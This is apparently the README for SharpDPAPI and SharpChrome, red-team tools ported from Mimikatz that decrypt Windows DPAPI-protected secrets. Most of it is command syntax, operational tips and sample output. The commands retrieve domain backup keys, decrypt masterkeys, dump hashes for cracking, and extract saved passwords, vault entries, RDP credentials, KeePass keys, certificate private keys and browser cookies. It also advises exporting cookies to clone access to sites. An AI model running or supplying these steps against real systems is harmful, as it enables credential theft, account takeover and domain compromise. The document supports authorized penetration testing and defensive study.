SharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.
I did not come up with this logic, it is simply a port from Mimikatz in order to better understand the process and operationalize it to fit our workflow.
The SharpChrome subproject is an adaptation of work from @gentilkiwi and @djhohnstein, specifically his SharpChrome project. However, this version of SharpChrome uses a different version of the C# SQL library that supports lockless opening. SharpChrome is built as a separate project in SharpDPAPI because of the size of the SQLite library utilized.
Both Chrome and newer Chromium-based Edge browsers can be triaged with SharpChrome.
SharpChrome also uses an minimized version of @AArnott's BCrypt P/Invoke code released under the MIT License.
If you're unfamiliar with DPAPI, check out this post for more background information. For more information on Credentials and Vaults in regards to DPAPI, check out Benjamin's wiki entry on the subject.
@harmj0y is the primary author of this port.
SharpDPAPI is licensed under the BSD 3-Clause license.
- SharpDPAPI
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v1.20.0
Retrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:
SharpDPAPI backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]
The *search* comand will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs:
search /type:registry [/path:HKLM\path\to\key] [/showErrors]
search /type:folder /path:C:\path\to\folder [/maxBytes:<numOfBytes>] [/showErrors]
search /type:file /path:C:\path\to\file [/maxBytes:<numOfBytes>]
search /type:base64 [/base:<base64 string>]
Machine/SYSTEM Triage:
machinemasterkeys - triage all reachable machine masterkey files (elevates to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret)
machinecredentials - use 'machinemasterkeys' and then triage machine Credential files
machinevaults - use 'machinemasterkeys' and then triage machine Vaults
machinetriage - run the 'machinecredentials' and 'machinevaults' commands
User Triage:
Arguments for the 'masterkeys' command:
/target:FILE/folder - triage a specific masterkey, or a folder full of masterkeys (otherwise triage local masterkeys)
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)
/credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local SHA1, works remotely)
/rpc - decrypt the target user's masterkeys by asking domain controller to do so
/server:SERVER - triage a remote server, assuming admin access
/hashes - output usermasterkey file 'hashes' in JTR/Hashcat format (no decryption)
Arguments for the credentials|vaults|rdg|keepass|triage|blob|ps commands:
Decryption:
/unprotect - force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)
/credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local SHA1, works remotely)
/rpc - decrypt the target user's masterkeys by asking domain controller to do so
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption
Targeting:
/target:FILE/folder - triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file location, or 'Vault' folder
/server:SERVER - triage a remote server, assuming admin access
Note: must use with /pvk:KEY or /password:X
Note: not applicable to 'blob' or 'ps' commands
Certificate Triage:
Arguments for the 'certificates' command:
/showall - show all decrypted private key files, not just ones that are linked to installed certs (the default)
/machine - use the local machine store for certificate triage
/mkfile | /target - for /machine triage
[all decryption args from User Triage above]
Note: in most cases, just use *triage* if you're targeting user DPAPI secrets and *machinetriage* if you're going after SYSTEM DPAPI secrets.
These functions wrap all the other applicable functions that can be automatically run.
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v1.9.0
Retrieve a domain controller's DPAPI backup key, optionally specifying a DC and output file:
SharpChrome backupkey [/nowrap] [/server:SERVER.domain] [/file:key.pvk]
Global arguments for the 'cookies', 'logins', and 'statekeys' commands:
Decryption:
/unprotect - force use of CryptUnprotectData() (default for unprivileged execution)
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)
/prekey:X - decrypt the target user's masterkeys using a DPAPI prekey (domain or local SHA1, works remotely)
/rpc - decrypt the target user's masterkeys by asking domain controller to do so
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/statekey:X - a decrypted AES state key (from the 'statekey' command)
Targeting:
/target:FILE - triage a specific 'Cookies', 'Login Data', or 'Local State' file location
/target:C:\Users\X\ - triage a specific user folder for any specified command
/server:SERVER - triage a remote server, assuming admin access (note: must use with /pvk:KEY)
/browser:X - triage 'chrome' (default), (chromium-based) 'edge', or 'slack'
Output:
/format:X - either 'csv' (default) or 'table' display
/showall - show Login Data entries with null passwords and expired Cookies instead of filtering (default)
/consoleoutfile:X - output all console output to a file on disk
'cookies' command specific arguments:
/cookie:"REGEX" - only return cookies where the cookie name matches the supplied regex
/url:"REGEX" - only return cookies where the cookie URL matches the supplied regex
/format:json - output cookie values in an EditThisCookie JSON import format. Best when used with a regex!
/setneverexpire - set expirations for cookies output to now + 100 years (for json output)
One of the goals with SharpDPAPI is to operationalize Benjamin's DPAPI work in a way that fits with our workflow.
How exactly you use the toolset will depend on what phase of an engagement you're in. In general this breaks into "have I compromised the domain or not".
If domain admin (or equivalent) privileges have been obtained, the domain DPAPI backup key can be retrieved with the backupkey command (or with Mimikatz). This domain private key never changes, and can decrypt any DPAPI masterkeys for domain users. This means, given a domain DPAPI backup key, an attacker can decrypt masterkeys for any domain user that can then be used to decrypt any Vault/Credentials/Chrome Logins/other DPAPI blobs/etc. The key retrieved from the backupkey command can be used with the masterkeys, credentials, vaults, rdg, or triage commands.
If DA privileges have not been achieved, using Mimikatz' sekurlsa::dpapi
command will retrieve DPAPI masterkey {GUID}:SHA1 mappings of any loaded master keys (user and SYSTEM) on a given system (tip: running dpapi::cache
after key extraction will give you a nice table). If you change these keys to a {GUID1}:SHA1 {GUID2}:SHA1...
type format, they can be supplied to the credentials, vaults, rdg, or triage commands. This lets you triage all Credential files/Vaults on a system for any user who's currently logged in, without having to do file-by-file decrypts.
Alternatively, if you can supply a target user's password, NTLM hash, or DPAPI prekey for user-command with /password:X
, /ntlm:X
, or /prekey:X
respectively. The dpapi
field of Mimikatz' sekurlsa::msv
output for domain users can be used as the /prekey
, while the sha1
field of sekurlsa::msv
output can be used as the /prekey
for local users.
For decrypting RDG/RDCMan.settings files with the rdg command, the /unprotect
flag will use CryptUnprotectData() to decrypt any saved RDP passwords, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.
For machine-specific DPAPI triage, the machinemasterkeys|machinecredentials|machinevaults|machinetriage
commands will do the machine equivalent of user DPAPI triage. If in an elevated context (that is, you need local administrative rights), SharpDPAPI will elevate to SYSTEM privileges to retrieve the "DPAPI_SYSTEM" LSA secret, which is then used to decrypt any discovered machine DPAPI masterkeys. These keys are then used as lookup tables for machine credentials/vaults/etc.
For more offensive DPAPI information, check here.
SharpChrome is a Chrome-specific implementation of SharpDPAPI capable of cookies and logins decryption/triage. It is built as a separate project in SharpDPAPI because of the size of the SQLite library utilized.
Since Chrome Cookies/Login Data are saved without CRYPTPROTECT_SYSTEM, CryptUnprotectData() is back on the table. If SharpChrome is run from an unelevated contect, it will attempt to decrypt any logins/cookies for the current user using CryptUnprotectData(). A /pvk:[BASE64|file.pvk]
, {GUID}:SHA1 lookup table, /password:X
, /ntlm:X
, /prekey:X
, or /mkfile:FILE
of {GUID}:SHA1 values can also be used to decrypt values. Also, the C# SQL library used (with a few modifications) supports lockless opening, meaning that Chrome does not have to be closed/target files do not have to be copied to another location.
Alternatively, if you can supply a target user's password, NTLM hash, or DPAPI prekey for user-command with /password:X
, /ntlm:X
, or /prekey:X
respectively. The dpapi
field of Mimikatz' sekurlsa::msv
output for domain users can be used as the /prekey
, while the sha1
field of sekurlsa::msv
output can be used as the /prekey
for local users.
If Chrome is version 80+, an AES state key is stored in AppData\Local\Google\Chrome\User Data\Local State - this key is protected with DPAPI, so we can use CryptUnprotectData()/pvk/masterkey lookup tables to decrypt it. This AES key is then used to protect new cookie and login data entries. This is also the process when /browser:edge
or /browser:brave
is specified, for newer Chromium-based Edge browser triage.
By default, cookies and logins are displayed as a csv - this can be changed with /format:table
for table output, and /format:json
for cookies specifically. The json option outputs cookies in a json format that can be imported into the EditThisCookie Chrome extension for easy reuse.
The cookies command also has /cookie:REGEX
and /url:REGEX
arguments to only return cookie names or urls matching the supplied regex. This is useful with /format:json
to easily clone access to specific sites.
Specific cookies/logins/statekey files can be specified with /target:X
, and a user folder can be specified with /target:C:\Users\USER\
for any triage command.
The masterkeys command will search for any readable user masterkey files and decrypt them using a supplied domain DPAPI backup key. It will return a set of masterkey {GUID}:SHA1 mappings.
/password:X
can be used to decrypt a user's current masterkeys. Note that for domain-joined machines, the password can be supplied in either plaintext or NTLM format. If /target
is also supplied with /password
, the /sid:X
full domain SID of the user also needs to be specified.
The domain backup key can be in base64 form (/pvk:BASE64...
) or file form (/pvk:key.pvk
).
C:\Temp>SharpDPAPI.exe masterkeys /pvk:key.pvk
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v1.2.0
[*] Action: Triage User Masterkey Files
[*] Found MasterKey : C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1473254003-2681465353-4059813368-1000\28678d89-678a-404f-a197-f4186315c4fa
[*] Found MasterKey : C:\Users\harmj0y\AppData\Roaming\Microsoft\Protect\S-1-5-21-883232822-274137685-4173207997-1111\3858b304-37e5-48aa-afa2-87aced61921a
...(snip)...
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316...(snip)...
...(snip)...
If no /pasword
or /pvk
is specified, you may pass the /hashes
flag to dump the master key hashes in John/Hashcat format. In this mode, the hashes are printed in the format of {GUID}:DPAPImk
.
The Preferred
key is also parsed in order to highlight the current preferred master key, so that effort is not spent cracking older keys.
C:\Temp>SharpDPAPI.exe masterkeys /hashes
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v1.11.3
[*] Action: User DPAPI Masterkey File Triage
[*] Will dump user masterkey hashes
[*] Found MasterKey : C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1473254003-2681465353-4059813368-1000\28678d89-678a-404f-a197-f4186315c4fa
[*] Found MasterKey : C:\Users\harmj0y\AppData\Roaming\Microsoft\Protect\S-1-5-21-883232822-274137685-4173207997-1111\3858b304-37e5-48aa-afa2-87aced61921a
...(snip)...
[*] Preferred master keys:
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1473254003-2681465353-4059813368-1000\28678d89-678a-404f-a197-f4186315c4fa
C:\Users\harmj0y\AppData\Roaming\Microsoft\Protect\S-1-5-21-883232822-274137685-4173207997-1111\3858b304-37e5-48aa-afa2-87aced61921a
[*] User master key hashes:
{42e95117-ff5f-40fa-a6fc-87584758a479}:$DPAPImk$1*3*S-1-5-21-1473254003-2681465353-4059813368-1000*des3*sha1*18000*09c49e9af9...(snip)...
The credentials command will search for Credential files and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
A specific credential file (or folder of credentials) can be specified with /target:FILE
or /target:C:\Folder\
. If a file is specified, {GUID}:SHA1 values are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied.
If run from an elevated context, Credential files for ALL users will be triaged, otherwise only Credential files for the current user will be processed.
Using domain {GUID}:SHA1 masterkey mappings:
C:\Temp>SharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...(snip)...
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v1.2.0
[*] Action: User DPAPI Credential Triage
[*] Triaging Credentials for ALL users
Folder : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\
CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB
guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}
size : 436
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description : Local Credential Data
LastWritten : 1/22/2019 2:44:40 AM
TargetName : Domain:target=TERMSRV/10.4.10.101
TargetAlias :
Comment :
UserName : DOMAIN\user
Credential : Password!
...(snip)...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys:
C:\Temp>SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
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v1.2.0
[*] Action: User DPAPI Credential Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging Credentials for ALL users
Folder : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\
CredFile : 48C08A704ADBA03A93CD7EC5B77C0EAB
guidMasterKey : {885342c6-028b-4ecf-82b2-304242e769e0}
size : 436
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description : Local Credential Data
LastWritten : 1/22/2019 2:44:40 AM
TargetName : Domain:target=TERMSRV/10.4.10.101
TargetAlias :
Comment :
UserName : DOMAIN\user
Credential : Password!
...(snip)...
The vaults command will search for Vaults and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
The Policy.vpol folder in the Vault folder is decrypted with any supplied DPAPI keys to retrieve the associated AES decryption keys, which are then used to decrypt any associated .vcrd files.
A specific vault folder can be specified with /target:C:\Folder\
. In this case, either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied.
Using domain {GUID}:SHA1 masterkey mappings:
C:\Temp>SharpDPAPI.exe vaults {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687...(snip)... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...(snip)...
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v1.2.0
[*] Action: User DPAPI Vault Triage
[*] Triaging Vaults for ALL users
[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 10/12/2018 12:10:42 PM
FriendlyName : Internet Explorer
Identity : admin
Resource : https://10.0.0.1/
Authenticator : Password!
...(snip)...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys:
C:\Temp>SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
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v1.2.0
[*] Action: DPAPI Vault Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging Vaults for ALL users
[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 10/12/2018 12:10:42 PM
FriendlyName : Internet Explorer
Identity : admin
Resource : https://10.0.0.1/
Authenticator : Password!
...(snip)...
Using a domain DPAPI backup key with a folder specified (i.e. "offline" triage):
C:\Temp>SharpDPAPI.exe vaults /target:C:\Temp\test\ /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
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v1.2.0
[*] Action: User DPAPI Vault Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Target Vault Folder: C:\Temp\test\
[*] Triaging Vault folder: C:\Temp\test\
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 3/20/2019 6:03:50 AM
FriendlyName : Internet Explorer
Identity : account
Resource : http://www.abc.com/
Authenticator : password
The rdg command will search for RDCMan.settings files for the current user (or if elevated, all users) and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
The /unprotect
flag will use CryptUnprotectData() to decrypt any saved RDP passwords, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.
A specific RDCMan.settings file, .RDC file (or folder of .RDG files) can be specified with /target:FILE
or /target:C:\Folder\
. If a file is specified, {GUID}:SHA1 values (or /unprotect
) are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied.
This command will decrypt any saved password information from both the RDCMan.settings file and any .RDG files referenced by the RDCMan.settings file.
Using /unprotect
to decrypt any found passwords:
C:\Temp>SharpDPAPI.exe rdg /unprotect
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v1.3.0
[*] Action: RDG Triage
[*] Using CryptUnprotectData() to decrypt RDG passwords
[*] Triaging RDCMan Settings Files for current user
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
Using domain {GUID}:SHA1 masterkey mappings:
C:\Temp>SharpDPAPI.exe rdg {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017
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v1.3.0
[*] Action: RDG Triage
[*] Using CryptUnprotectData() to decrypt RDG passwords
[*] Triaging RDCMan Settings Files for current user
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys:
C:\Temp>SharpDPAPI.exe rdg /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.3.0
[*] Action: RDG Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging RDCMan.settings Files for ALL users
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm.a
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
The keepass command will search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all users) and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
The /unprotect
flag will use CryptUnprotectData() to decrypt the key bytes, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.
A specific ProtectedUserKey.bin file, .RDC file (or folder of .RDG files) can be specified with /target:FILE
or /target:C:\Folder\
. If a file is specified, {GUID}:SHA1 values (or /unprotect
) are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied.
Decrypted key file bytes can be used with the modified KeePass version in KeeThief.
Using /unprotect
to decrypt any found key material:
C:\Temp> SharpDPAPI.exe keepass /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: KeePass Triage
[*] Using CryptUnprotectData() for decryption.
[*] Triaging KeePass ProtectedUserKey.bin files for current user
File : C:\Users\harmj0y\AppData\Roaming\KeePass\ProtectedUserKey.bin
Accessed : 3/1/2021 1:38:22 PM
Modified : 1/4/2021 5:49:49 PM
guidMasterKey : {dab90445-0a08-4b27-9110-b75d4a7894d0}
size : 210
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
Key Bytes : 39 2E 63 EF 0E 37 E8 5C 34 ...
SharpDPAPI completed in 00:00:00.0566660
The certificates command will search user encrypted DPAPI certificate private keys a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
The /unprotect
flag will use CryptUnprotectData() to decrypt private keys, if the command is run from the user context whose certificates you are trying to access. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.
A specific certificate can be specified with /target:FILE
or /target:C:\Folder\
. In both cases, {GUID}:SHA1 values (or /unprotect
) are required or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied.
By default, only private keys linkable to an associated installed certificate are displayed. The /showall
command will display ALL decrypted private keys.
Use the /cng
flag for CNG private keys (default is capi).
Using domain {GUID}:SHA1 masterkey mappings:
C:\Temp> SharpDPAPI.exe certificates {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : ef98458bca7135fe1bb89b3715180ae6
HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85
Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da
Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 2/22/2021 2:19:02 PM
Expiry Date : 2/22/2022 2:19:02 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Secure Email (1.3.6.1.5.5.7.3.4)
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
[*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...
-----END CERTIFICATE-----
Using /unprotect
to decrypt any found user certificates:
C:\Temp> SharpDPAPI.exe certificates /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.11.3
[*] Action: Certificate Triage
[*] Using CryptUnprotectData() for decryption.
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : f29fa2bb6de62b7d966a407ef203ac45_3fef0615-487e-485b-84b0-193b510dec3b
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {27db0044-e2aa-4ea2-b2c0-c469e9b29ed9}
Description : Private Key
algCrypt : CALG_AES_256 (keyLen 256)
algHash : CALG_SHA_512 (32782)
Salt : d7e1e00ed8a6249b5f05c487154e83cc0b51f71131530d0d46d3bfc63d890468
HMAC : 4869f296cdcc964262a57e2efc4f2c5df57c2ed7319e297daa2107810da5c171
Unique Name : {4A07001C-57BE-4E8B-86D1-43CACDF8D448}
Thumbprint : BBD9B90FE1A4E37BD646CBC922ABE06C24C1E725
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 10/18/2022 11:40:07 AM
Expiry Date : 10/18/2023 12:00:07 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Server Authentication (1.3.6.1.5.5.7.3.1)
[*] Private key file f29fa2bb6de62b7d966a407ef203ac45_3fef0615-487e-485b-84b0-193b510dec3b was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxVEW49fMt...(snip)...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDKjCCAhKgAwIBAgIQYwhUr...(snip)...
-----END CERTIFICATE-----
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys:
C:\Temp>SharpDPAPI.exe certificates /pvk:HvG1sAAAAAABAAAAAAAAAAAAAACU...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB51371...(snip)...
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : ef98458bca7135fe1bb89b3715180ae6
HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85
